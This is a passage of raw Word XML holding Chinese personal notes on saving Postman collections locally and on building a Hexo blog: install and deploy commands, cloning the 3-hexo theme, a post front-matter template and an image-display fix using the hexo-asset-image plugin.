        <w:t>的数据无法从服务器加载，针对有可能存在服务器崩溃的情况，我认为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>postman</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的数据还是保存本地为好。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070DB016" w14:textId="315EF2BD" w:rsidR="00AD0910" w:rsidRPr="00AD0910" w:rsidRDefault="00AD0910" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD0910">
        <w:t>https://blog.csdn.net/weixin_43145779/article/details/103958809</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455D95EB" w14:textId="77777777" w:rsidR="00AD0910" w:rsidRDefault="00AD0910" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58D0B92A" w14:textId="5271D590" w:rsidR="00AD0910" w:rsidRDefault="00AD0910" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>右键</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>collections</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的目录，导出为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A2AF9E" w14:textId="77777777" w:rsidR="00AD0910" w:rsidRDefault="00AD0910" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13B7648D" w14:textId="77777777" w:rsidR="009A641D" w:rsidRDefault="009A641D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78CF2048" w14:textId="3CABF364" w:rsidR="009A641D" w:rsidRDefault="009A641D" w:rsidP="009A641D">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>blog搭建</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F95FB2C" w14:textId="11E26670" w:rsidR="009A641D" w:rsidRDefault="009A641D" w:rsidP="009A641D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个人博客搭建</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F555E07" w14:textId="461315F2" w:rsidR="009A641D" w:rsidRDefault="009A641D" w:rsidP="009A641D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21ACD3F0" w14:textId="421D245B" w:rsidR="009A641D" w:rsidRPr="0076365C" w:rsidRDefault="0076365C" w:rsidP="009A641D">
      <w:hyperlink r:id="rId307" w:history="1">
        <w:r w:rsidRPr="0016133E">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://zhuanlan.zhihu.com/p/60578464</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该链接在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部署</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0076365C">
        <w:t>_config.yml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处有问题，参考</w:t>
      </w:r>
      <w:r w:rsidRPr="0076365C">
        <w:t>https://hexo.io/docs/one-command-deployment#Git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A05C3BB" w14:textId="53B0235B" w:rsidR="009A641D" w:rsidRDefault="009A641D" w:rsidP="009A641D">
      <w:hyperlink r:id="rId308" w:history="1">
        <w:r w:rsidRPr="0016133E">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://hexo.io/zh-cn/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3D1EBBCA" w14:textId="77777777" w:rsidR="009A641D" w:rsidRDefault="009A641D" w:rsidP="009A641D"/>
    <w:p w14:paraId="49A393B4" w14:textId="77777777" w:rsidR="009A641D" w:rsidRDefault="009A641D" w:rsidP="009A641D"/>
    <w:p w14:paraId="657324C1" w14:textId="7DD1B009" w:rsidR="009864A2" w:rsidRDefault="009864A2" w:rsidP="009864A2">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="009864A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Hexo </w:t>
      </w:r>
      <w:r w:rsidRPr="009864A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化和本地预览</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BA979B" w14:textId="77777777" w:rsidR="009864A2" w:rsidRDefault="009864A2" w:rsidP="009864A2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="009864A2">
        <w:t>npm install -g hexo-cli</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EE0ECD" w14:textId="77777777" w:rsidR="009864A2" w:rsidRPr="009864A2" w:rsidRDefault="009864A2" w:rsidP="009864A2"/>
    <w:p w14:paraId="20C7D717" w14:textId="56F5866C" w:rsidR="009864A2" w:rsidRDefault="009864A2" w:rsidP="009864A2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化并安装所需组件</w:t>
      </w:r>
      <w:r w:rsidR="006F76C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（首次）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06616F16" w14:textId="77777777" w:rsidR="009864A2" w:rsidRDefault="009864A2" w:rsidP="009864A2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">hexo init      # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EF614D" w14:textId="77777777" w:rsidR="009864A2" w:rsidRDefault="009864A2" w:rsidP="009864A2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">npm install    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装组件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC727F2" w14:textId="77777777" w:rsidR="009864A2" w:rsidRDefault="009864A2" w:rsidP="009864A2"/>
    <w:p w14:paraId="5D9CCB71" w14:textId="1C56D394" w:rsidR="009864A2" w:rsidRDefault="009864A2" w:rsidP="009864A2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完成后依次输入下面命令，启动本地服务器进行预览：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6335A017" w14:textId="77777777" w:rsidR="009864A2" w:rsidRDefault="009864A2" w:rsidP="009864A2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">hexo g   # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C813EA" w14:textId="1B4B7DBB" w:rsidR="009864A2" w:rsidRDefault="009864A2" w:rsidP="009864A2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">hexo s   # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动预览</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016D11AD" w14:textId="33FF5DF5" w:rsidR="009864A2" w:rsidRDefault="006F76C2" w:rsidP="009A641D">
      <w:r w:rsidRPr="006F76C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">hexo d   # </w:t>
      </w:r>
      <w:r w:rsidRPr="006F76C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部署发布</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3470DD" w14:textId="77777777" w:rsidR="005943BD" w:rsidRDefault="005943BD" w:rsidP="009A641D"/>
    <w:p w14:paraId="4662C879" w14:textId="0DC117E7" w:rsidR="005943BD" w:rsidRDefault="005943BD" w:rsidP="009A641D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主题：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0413B9F0" w14:textId="1BE92F67" w:rsidR="005943BD" w:rsidRDefault="00494BE5" w:rsidP="009A641D">
      <w:hyperlink r:id="rId309" w:history="1">
        <w:r w:rsidRPr="0016133E">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://hexo.io/themes/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C339FB5" w14:textId="77777777" w:rsidR="00420505" w:rsidRDefault="00494BE5" w:rsidP="009A641D">
      <w:hyperlink r:id="rId310" w:history="1">
        <w:r w:rsidRPr="0016133E">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://github.com/yelog/hexo-theme-3-hexo</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00420505">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C39CE8" w14:textId="2330E540" w:rsidR="00494BE5" w:rsidRDefault="00420505" w:rsidP="009A641D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3-hexo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文档：</w:t>
      </w:r>
      <w:r w:rsidRPr="00420505">
        <w:t>http://yelog.org/2017/03/23/3-hexo-instruction/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45565EA5" w14:textId="77777777" w:rsidR="00494BE5" w:rsidRDefault="00494BE5" w:rsidP="009A641D"/>
    <w:p w14:paraId="263BA5C0" w14:textId="77777777" w:rsidR="00494BE5" w:rsidRPr="00B23739" w:rsidRDefault="00494BE5" w:rsidP="009A641D"/>
    <w:p w14:paraId="4C17E9D8" w14:textId="77777777" w:rsidR="00494BE5" w:rsidRPr="00494BE5" w:rsidRDefault="00494BE5" w:rsidP="009A641D"/>
    <w:p w14:paraId="09020475" w14:textId="77777777" w:rsidR="009864A2" w:rsidRDefault="009864A2" w:rsidP="009A641D"/>
    <w:p w14:paraId="17CB1DE0" w14:textId="48311FE2" w:rsidR="00324BC4" w:rsidRDefault="00324BC4" w:rsidP="00324BC4">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建文章</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2066E551" w14:textId="77777777" w:rsidR="00324BC4" w:rsidRDefault="00324BC4" w:rsidP="009A641D"/>
    <w:p w14:paraId="7ED0E7C2" w14:textId="77777777" w:rsidR="006F76C2" w:rsidRDefault="006F76C2" w:rsidP="006F76C2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自己创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467DFE74" w14:textId="2F57EBD9" w:rsidR="006F76C2" w:rsidRPr="006F76C2" w:rsidRDefault="006F76C2" w:rsidP="006F76C2">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F76C2">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9789FF" w14:textId="77777777" w:rsidR="006F76C2" w:rsidRPr="006F76C2" w:rsidRDefault="006F76C2" w:rsidP="006F76C2">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F76C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">title: Hello World # </w:t>
      </w:r>
      <w:r w:rsidRPr="006F76C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>标题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5295EC67" w14:textId="77777777" w:rsidR="006F76C2" w:rsidRPr="006F76C2" w:rsidRDefault="006F76C2" w:rsidP="006F76C2">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F76C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">date: 2019/3/26 hh:mm:ss # </w:t>
      </w:r>
      <w:r w:rsidRPr="006F76C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>时间</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9B136B" w14:textId="77777777" w:rsidR="006F76C2" w:rsidRPr="006F76C2" w:rsidRDefault="006F76C2" w:rsidP="006F76C2">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F76C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">categories: # </w:t>
      </w:r>
      <w:r w:rsidRPr="006F76C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4444CE35" w14:textId="77777777" w:rsidR="006F76C2" w:rsidRPr="006F76C2" w:rsidRDefault="006F76C2" w:rsidP="006F76C2">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F76C2">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>- Diary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA79508" w14:textId="77777777" w:rsidR="006F76C2" w:rsidRPr="006F76C2" w:rsidRDefault="006F76C2" w:rsidP="006F76C2">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F76C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">tags: # </w:t>
      </w:r>
      <w:r w:rsidRPr="006F76C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>标签</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0D1C37" w14:textId="77777777" w:rsidR="006F76C2" w:rsidRPr="006F76C2" w:rsidRDefault="006F76C2" w:rsidP="006F76C2">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F76C2">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>- PS3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78002851" w14:textId="77777777" w:rsidR="006F76C2" w:rsidRPr="006F76C2" w:rsidRDefault="006F76C2" w:rsidP="006F76C2">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F76C2">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>- Games</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3917B06D" w14:textId="77777777" w:rsidR="006F76C2" w:rsidRPr="006F76C2" w:rsidRDefault="006F76C2" w:rsidP="006F76C2">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F76C2">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD808F5" w14:textId="77777777" w:rsidR="006F76C2" w:rsidRPr="006F76C2" w:rsidRDefault="006F76C2" w:rsidP="006F76C2">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66DC8428" w14:textId="77777777" w:rsidR="006F76C2" w:rsidRPr="006F76C2" w:rsidRDefault="006F76C2" w:rsidP="006F76C2">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F76C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>摘要</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C6D49D" w14:textId="77777777" w:rsidR="006F76C2" w:rsidRPr="006F76C2" w:rsidRDefault="006F76C2" w:rsidP="006F76C2">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F76C2">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;!--more--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A108B5" w14:textId="4AD75BF5" w:rsidR="006F76C2" w:rsidRDefault="006F76C2" w:rsidP="006F76C2">
      <w:r w:rsidRPr="006F76C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>正文</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6041950E" w14:textId="77777777" w:rsidR="006F76C2" w:rsidRDefault="006F76C2" w:rsidP="009A641D"/>
    <w:p w14:paraId="6B95C8E8" w14:textId="02ACF586" w:rsidR="00494BE5" w:rsidRDefault="00494BE5" w:rsidP="00494BE5">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更换主题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239399D9" w14:textId="77777777" w:rsidR="00494BE5" w:rsidRDefault="00494BE5" w:rsidP="00494BE5"/>
    <w:p w14:paraId="4575725E" w14:textId="27077625" w:rsidR="00494BE5" w:rsidRDefault="00494BE5" w:rsidP="00494BE5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到特定目录</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00494BE5">
        <w:t>themes/3-hero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F2703A" w14:textId="51348D0F" w:rsidR="00494BE5" w:rsidRPr="00494BE5" w:rsidRDefault="00494BE5" w:rsidP="00494BE5">
      <w:r w:rsidRPr="00494BE5">
        <w:t>git clone https://github.com/yelog/hexo-theme-3-hexo.git themes/3-hero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4285C2F0" w14:textId="77777777" w:rsidR="00494BE5" w:rsidRPr="00494BE5" w:rsidRDefault="00494BE5" w:rsidP="00494BE5"/>
    <w:p w14:paraId="552D4150" w14:textId="32F0687D" w:rsidR="00494BE5" w:rsidRDefault="00494BE5" w:rsidP="009A641D">
      <w:r w:rsidRPr="00494BE5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00494BE5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> _config.yml </w:t>
      </w:r>
      <w:r w:rsidRPr="00494BE5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00494BE5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> theme </w:t>
      </w:r>
      <w:r w:rsidRPr="00494BE5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为新主题名称</w:t>
      </w:r>
      <w:r w:rsidRPr="00494BE5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00494BE5">
        <w:t>3-hero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5928FC15" w14:textId="77777777" w:rsidR="00494BE5" w:rsidRDefault="00494BE5" w:rsidP="009A641D"/>
    <w:p w14:paraId="187ADB54" w14:textId="77777777" w:rsidR="00494BE5" w:rsidRDefault="00494BE5" w:rsidP="009A641D"/>
    <w:p w14:paraId="4D877F97" w14:textId="79DE6CFD" w:rsidR="006628AE" w:rsidRDefault="006628AE" w:rsidP="006628AE">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>坑点：图片不显示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6571BA25" w14:textId="77777777" w:rsidR="006628AE" w:rsidRDefault="006628AE" w:rsidP="009A641D"/>
    <w:p w14:paraId="0549113F" w14:textId="7BE40370" w:rsidR="006628AE" w:rsidRDefault="006628AE" w:rsidP="009A641D">
      <w:hyperlink r:id="rId311" w:history="1">
        <w:r w:rsidRPr="0016133E">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://ucas-yanyang.github.io/Hexo_Notes/hexo_notes/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D22CC12" w14:textId="75422A37" w:rsidR="006628AE" w:rsidRPr="006628AE" w:rsidRDefault="006628AE" w:rsidP="009A641D">
      <w:r w:rsidRPr="006628AE">
        <w:t>https://blog.csdn.net/m0_43401436/article/details/107191688</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F5B11B" w14:textId="77777777" w:rsidR="006628AE" w:rsidRDefault="006628AE" w:rsidP="009A641D"/>
    <w:p w14:paraId="0E8F54C3" w14:textId="6E0D3535" w:rsidR="006628AE" w:rsidRDefault="0027340B" w:rsidP="009A641D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意看插件原官网</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>readme</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的说明，虽然有点反人类，但是插件只能这么做：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A0D6FD" w14:textId="0AD4BC1A" w:rsidR="0027340B" w:rsidRDefault="00143192" w:rsidP="009A641D">
      <w:hyperlink r:id="rId312" w:history="1">
        <w:r w:rsidRPr="009D5CE7">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://github.com/xcodebuild/hexo-asset-image</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="51609E12" w14:textId="27C83D6A" w:rsidR="00143192" w:rsidRDefault="00143192" w:rsidP="009A641D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（因为本身插件问题，对于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vscode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来说，这个图片路径是不对的，所以渲染不出来，但是部署到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上，图片是正常可以显示的）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C181FFD" w14:textId="31390776" w:rsidR="00143192" w:rsidRPr="00143192" w:rsidRDefault="00143192" w:rsidP="009A641D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73E01102" wp14:editId="29F3B87F">
            <wp:extent cx="3035549" cy="1871910"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1089248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48151" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId313"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3040313" cy="1874848"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7EC128" w14:textId="4FA614CD" w:rsidR="0027340B" w:rsidRDefault="0027340B" w:rsidP="009A641D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3178E898" wp14:editId="34054AE4">
            <wp:extent cx="3064951" cy="1301479"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="112174016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40167" name="图片 1" descr="图形用户界面, 应用程序&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId314"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
